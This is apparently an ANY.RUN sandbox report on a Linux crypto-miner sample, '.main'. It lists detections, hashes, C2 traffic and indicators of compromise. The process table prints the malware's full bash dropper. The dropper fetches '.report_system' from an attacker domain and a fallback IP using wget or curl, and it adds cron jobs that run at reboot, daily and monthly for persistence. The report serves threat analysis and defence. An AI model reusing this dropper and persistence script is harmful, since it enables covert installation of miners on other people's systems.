Malware analysis .main Malicious activity | ANY.RUN

Add for printing

File name:	.main
Full analysis:	https://app.any.run/tasks/92adbd00-ddf9-4b7f-9d56-ff4f7ce225ec
Verdict:	Malicious activity
Threats:	Crypto mining malware is a resource-intensive threat that infiltrates computers with the purpose of mining cryptocurrencies. This type of threat can be deployed either on an infected machine or a compromised website. In both cases the miner will utilize the computing power of the device and its network bandwidth. Malware Trends Tracker >>>
Analysis date:	November 16, 2024, 01:32:23
OS:	Ubuntu 22.04.2 LTS
Tags:	opendir miner
Indicators:
MIME:	application/x-executable
File info:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
MD5:	70A741DE589E0538307850CF036BDE70
SHA1:	A35398EF7CF835937C30F1C60D3DB82F035DCB47
SHA256:	5531F59F87BCA7E0C35846051362D51DE071AFB8533A55A248B0AF4650465A5F
SSDEEP:	12288:jRbrSzjeJsoiPu1KVBIY5OD6eedk77MnZpMVU5xpMF/btGygXiqrFHsCwPA2uBM/:NTMlD++rbsBDtLVRvayJYNi

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Add for printing

MALICIOUS
- MINER has been detected (SURICATA)
  - .report_system (PID: 35804)
- Connects to the CnC server
  - .report_system (PID: 35804)
SUSPICIOUS
- Uses wget to download content
  - bash (PID: 35781)
- Potential Corporate Privacy Violation
  - wget (PID: 35784)
  - .report_system (PID: 35804)
- Modifies file or directory owner
  - sudo (PID: 35777)
- Checks DMI information (probably VM detection)
  - .report_system (PID: 35800)
- Modifies Cron jobs
  - bash (PID: 35781)
- Executes commands using command-line interpreter
  - sudo (PID: 35780)
  - bash (PID: 35781)
- Gets information about currently running processes
  - bash (PID: 35798)
  - bash (PID: 35863)
  - bash (PID: 35869)
  - bash (PID: 35875)
  - bash (PID: 35891)
  - bash (PID: 35914)
  - bash (PID: 35815)
  - bash (PID: 35821)
  - bash (PID: 35827)
  - bash (PID: 35834)
  - bash (PID: 35840)
  - bash (PID: 35856)
  - bash (PID: 35846)
  - bash (PID: 35881)
  - bash (PID: 35951)
  - bash (PID: 35982)
  - bash (PID: 35964)
  - bash (PID: 35976)
  - bash (PID: 36014)
  - bash (PID: 36001)
  - bash (PID: 36007)
  - bash (PID: 36020)
  - bash (PID: 36026)
  - bash (PID: 36032)
  - bash (PID: 35926)
  - bash (PID: 35932)
  - bash (PID: 35939)
  - bash (PID: 35945)
  - bash (PID: 35957)
  - bash (PID: 35970)
  - bash (PID: 35989)
  - bash (PID: 35995)
  - bash (PID: 36051)
  - bash (PID: 36076)
  - bash (PID: 36064)
  - bash (PID: 36070)
  - bash (PID: 36083)
  - bash (PID: 36095)
  - bash (PID: 36101)
  - bash (PID: 36108)
  - bash (PID: 36114)
  - bash (PID: 36039)
  - bash (PID: 36045)
  - bash (PID: 36057)
  - bash (PID: 36089)
  - bash (PID: 36120)
- Executes the "rm" command to delete files or directories
  - bash (PID: 35781)
- Reads /proc/mounts (likely used to find writable filesystems)
  - python3.10 (PID: 35889)
- Connects to unusual port
  - .report_system (PID: 35804)
INFO
No info indicators.

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.o	\|	ELF Executable and Linkable format (generic) (49.8)

EXIF

EXE

CPUArchitecture:	64 bit
CPUByteOrder:	Little endian
ObjectFileType:	Executable file
CPUType:	AMD x86-64

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

525

Monitored processes

308

Malicious processes

6

Suspicious processes

1

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
35776	/bin/sh -c "sudo chown user /tmp/92adbd00-ddf9-4b7f-9d56-ff4f7ce225ec\.o && chmod +x /tmp/92adbd00-ddf9-4b7f-9d56-ff4f7ce225ec\.o && DISPLAY=:0 sudo -iu user /tmp/92adbd00-ddf9-4b7f-9d56-ff4f7ce225ec\.o "	/usr/bin/dash	—	any-guest-agent
User: root Integrity Level: UNKNOWN
35777	sudo chown user /tmp/92adbd00-ddf9-4b7f-9d56-ff4f7ce225ec.o	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
35778	chown user /tmp/92adbd00-ddf9-4b7f-9d56-ff4f7ce225ec.o	/usr/bin/chown	—	sudo
User: root Integrity Level: UNKNOWN Exit code: 0
35779	chmod +x /tmp/92adbd00-ddf9-4b7f-9d56-ff4f7ce225ec.o	/usr/bin/chmod	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
35780	sudo -iu user /tmp/92adbd00-ddf9-4b7f-9d56-ff4f7ce225ec.o	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN
35781	/tmp/92adbd00-ddf9-4b7f-9d56-ff4f7ce225ec.o -c " #\!/bin/bash RCU_GP_DIR=\"/var/tmp/\.rcu_gp\" REPORT_SYSTEM_URL=\"http://xkobeimparatu\.net/\.puscarie/\.report_system\" ALTERNATIVE_URL=\"http://66\.63\.187\.200/\.puscarie/\.report_system\" # IP-ul alternativ DIICOT_FILE=\"diicot\" # Functia pentru a descarca de la URL cu fallback download_report_system() { if command -v wget &> /dev/null; then # Prima incercare cu URL-ul principal wget \"\$REPORT_SYSTEM_URL\" -O \.report_system \|\| wget \"\$ALTERNATIVE_URL\" -O \.report_system elif command -v curl &> /dev/null; then # Prima incercare cu URL-ul principal curl -o \.report_system \"\$REPORT_SYSTEM_URL\" \|\| curl -o \.report_system \"\$ALTERNATIVE_URL\" else echo \"Nu s-a gasit nici wget, nici curl\" exit 1 fi } setup_report_system() { if [ \! -d \"\$RCU_GP_DIR\" ]; then mkdir \"\$RCU_GP_DIR\" fi cd \"\$RCU_GP_DIR\" \|\| exit # Descarca \.report_system de la URL principal, daca nu merge, incearca al doilea URL download_report_system chmod +x \.report_system cd - \|\| exit } create_diicot_file() { DIICOT_PATH=\"\$RCU_GP_DIR/\$DIICOT_FILE\" cat <<EOL > \"\$DIICOT_PATH\" #\!/bin/bash if \! pgrep -x \.report_system >/dev/null; then /var/tmp/\.rcu_gp/\./\.report_system --daemonized > /dev/null 2>&1 & disown \$* else : fi EOL chmod +x \"\$DIICOT_PATH\" } setup_cron_jobs() { locatie=\"\$RCU_GP_DIR\" locatie2=\"\$PWD\" if [ \! -f \"\$locatie/\.ps4\" ]; then echo \"\$locatie\" > \"\$locatie/\.ps4\" fi if \! crontab -l \| grep -q '\.main'; then rm -rf \"\$locatie/\.ps5\" echo \"@daily \$locatie/\$DIICOT_FILE\" >> \"\$locatie/\.ps5\" sleep 1 echo \"@reboot \$locatie2/\.main > /dev/null 2>&1 & disown\" >> \"\$locatie/\.ps5\" sleep 1 echo \"@monthly \$locatie2/\.main > /dev/null 2>&1 & disown\" >> \"\$locatie/\.ps5\" sleep 1 crontab \"\$locatie/\.ps5\" sleep 1 rm -rf \"\$locatie/\.ps5\" fi } setup_report_system create_diicot_file setup_cron_jobs while : do \$(cat /var/tmp/\.rcu_gp/\.ps4)/diicot setup_cron_jobs sleep 2\.5 done echo \"Merge bn mineru serifule\" " /tmp/92adbd00-ddf9-4b7f-9d56-ff4f7ce225ec.o	/usr/bin/bash	—	sudo
User: user Integrity Level: UNKNOWN
35782	/usr/bin/locale-check C.UTF-8	/usr/bin/locale-check	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
35783	mkdir /var/tmp/.rcu_gp	/usr/bin/mkdir	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
35784	wget http://xkobeimparatu.net/.puscarie/.report_system -O .report_system	/usr/bin/wget		bash
User: user Integrity Level: UNKNOWN Exit code: 0
35785	chmod +x .report_system	/usr/bin/chmod	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0

Add for printing

Executable files

0

Suspicious files

0

Text files

3

Unknown types

0

Dropped files

PID	Process	Filename		Type
35781	bash	/var/tmp/.rcu_gp/.ps4		text
		MD5:—	SHA256:—
35781	bash	/var/tmp/.rcu_gp/.ps5		text
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

13

TCP/UDP connections

18

DNS requests

24

Threats

3

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	204	185.125.190.48:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
35784	wget	GET	200	66.63.187.200:80	http://xkobeimparatu.net/.puscarie/.report_system	unknown	—	—	unknown
35804	.report_system	POST	200	66.63.187.200:3344	http://xkobeimparatu.net:3344/client/setClientStatus?clientId=ubuntu22	unknown	—	—	unknown
35804	.report_system	POST	200	66.63.187.200:3344	http://xkobeimparatu.net:3344/client/setClientStatus?clientId=ubuntu22	unknown	—	—	unknown
35804	.report_system	POST	200	66.63.187.200:3344	http://xkobeimparatu.net:3344/client/setClientStatus?clientId=ubuntu22	unknown	—	—	unknown
35804	.report_system	POST	200	66.63.187.200:3344	http://xkobeimparatu.net:3344/client/setClientStatus?clientId=ubuntu22	unknown	—	—	unknown
35804	.report_system	POST	200	66.63.187.200:3344	http://xkobeimparatu.net:3344/client/setClientStatus?clientId=ubuntu22	unknown	—	—	unknown
35804	.report_system	POST	200	66.63.187.200:3344	http://xkobeimparatu.net:3344/client/setClientStatus?clientId=ubuntu22	unknown	—	—	unknown
35804	.report_system	POST	200	66.63.187.200:3344	http://xkobeimparatu.net:3344/client/setClientStatus?clientId=ubuntu22	unknown	—	—	unknown
35804	.report_system	POST	200	66.63.187.200:3344	http://xkobeimparatu.net:3344/client/setClientStatus?clientId=ubuntu22	unknown	—	—	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
484	avahi-daemon	224.0.0.251:5353	—	—	—	unknown
—	—	185.125.190.48:80	connectivity-check.ubuntu.com	Canonical Group Limited	GB	whitelisted
35784	wget	66.63.187.200:80	xkobeimparatu.net	QUADRANET-INTERNET-SERVICES	US	unknown
35804	.report_system	116.203.43.182:80	xkobeproxy.xkobeimparatu.net	Hetzner Online GmbH	DE	unknown
35804	.report_system	66.63.187.200:3344	xkobeimparatu.net	QUADRANET-INTERNET-SERVICES	US	unknown
35889	python3.10	185.125.190.18:443	connectivity-check.ubuntu.com	Canonical Group Limited	GB	whitelisted

DNS requests

Domain	IP	Reputation
google.com	142.250.184.238 2a00:1450:4001:829::200e	whitelisted
connectivity-check.ubuntu.com	185.125.190.48 185.125.190.98 91.189.91.98 185.125.190.96 91.189.91.97 91.189.91.96 185.125.190.49 185.125.190.17 91.189.91.49 185.125.190.18 185.125.190.97 91.189.91.48 2620:2d:4002:1::198 2620:2d:4000:1::22 2620:2d:4000:1::23 2620:2d:4000:1::98 2620:2d:4002:1::196 2001:67c:1562::24 2620:2d:4002:1::197 2620:2d:4000:1::2b 2620:2d:4000:1::2a 2620:2d:4000:1::96 2620:2d:4000:1::97 2001:67c:1562::23	whitelisted
xkobeimparatu.net	66.63.187.200	unknown
69.100.168.192.in-addr.arpa	—	unknown
xkobeproxy.xkobeimparatu.net	116.203.43.182	unknown
changelogs.ubuntu.com	185.125.190.18 91.189.91.49 185.125.190.17 91.189.91.48 2620:2d:4000:1::2b 2620:2d:4000:1::2a	whitelisted

Threats

PID	Process	Class	Message
35784	wget	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
35804	.report_system	Potential Corporate Privacy Violation	ET POLICY Cryptocurrency Miner Checkin
35804	.report_system	Potential Corporate Privacy Violation	ET POLICY Cryptocurrency Miner Checkin

Add for printing

No debug info

General Info

.main

70A741DE589E0538307850CF036BDE70

A35398EF7CF835937C30F1C60D3DB82F035DCB47

5531F59F87BCA7E0C35846051362D51DE071AFB8533A55A248B0AF4650465A5F

12288:jRbrSzjeJsoiPu1KVBIY5OD6eedk77MnZpMVU5xpMF/btGygXiqrFHsCwPA2uBM/:NTMlD++rbsBDtLVRvayJYNi

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

MINER has been detected (SURICATA)

Connects to the CnC server

SUSPICIOUS

Uses wget to download content

Potential Corporate Privacy Violation

Modifies file or directory owner

Checks DMI information (probably VM detection)

Modifies Cron jobs

Executes commands using command-line interpreter

Gets information about currently running processes

Executes the "rm" command to delete files or directories

Reads /proc/mounts (likely used to find writable filesystems)

Connects to unusual port

INFO

Malware configuration

Static information

TRiD

EXIF

EXE

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings